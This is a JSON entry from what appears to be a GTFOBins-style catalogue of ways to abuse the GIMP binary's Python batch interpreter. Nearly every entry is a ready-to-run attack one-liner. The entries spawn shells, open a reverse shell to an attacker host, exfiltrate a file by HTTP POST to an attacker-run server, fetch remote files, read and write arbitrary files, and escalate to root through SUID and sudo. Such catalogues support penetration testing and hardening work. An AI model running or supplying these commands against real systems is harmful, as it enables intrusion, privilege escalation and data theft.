You cannot select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
57 lines
2.5 KiB
JSON
57 lines
2.5 KiB
JSON
5 years ago
|
{
|
||
|
"description": "The binary hangs after executing the Python code and can be terminated pressing 'ctrl-c'.",
|
||
|
"functions": {
|
||
|
"shell": [
|
||
|
{
|
||
|
"code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.system(\"sh\")'"
|
||
|
}
|
||
|
],
|
||
|
"reverse-shell": [
|
||
|
{
|
||
|
"description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
|
||
|
"code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\", [port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'\n"
|
||
|
}
|
||
|
],
|
||
|
"file-upload": [
|
||
|
{
|
||
|
"description": "Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
|
||
|
"code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))'\n"
|
||
|
},
|
||
|
{
|
||
|
"description": "Serve files in the local folder running an HTTP server.",
|
||
|
"code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()'\n"
|
||
|
}
|
||
|
],
|
||
|
"file-download": [
|
||
|
{
|
||
|
"description": "Fetch a remote file via HTTP GET request.",
|
||
|
"code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[url]\", \"[file]\")'\n"
|
||
|
}
|
||
|
],
|
||
|
"file-write": [
|
||
|
{
|
||
|
"code": "gimp -idf --batch-interpreter=python-fu-eval -b 'open(\"[file]\", \"wb\").write(\"DATA\")'\n"
|
||
|
}
|
||
|
],
|
||
|
"file-read": [
|
||
|
{
|
||
|
"code": "gimp -idf --batch-interpreter=python-fu-eval -b 'print(open(\"[file]\").read())'"
|
||
|
}
|
||
|
],
|
||
|
"library-load": [
|
||
|
{
|
||
|
"code": "gimp -idf --batch-interpreter=python-fu-eval -b 'from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")'"
|
||
|
}
|
||
|
],
|
||
|
"suid": [
|
||
|
{
|
||
|
"code": "./gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'"
|
||
|
}
|
||
|
],
|
||
|
"sudo": [
|
||
|
{
|
||
|
"code": "sudo gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.system(\"sh\")'"
|
||
|
}
|
||
|
]
|
||
|
}
|
||
|
}
|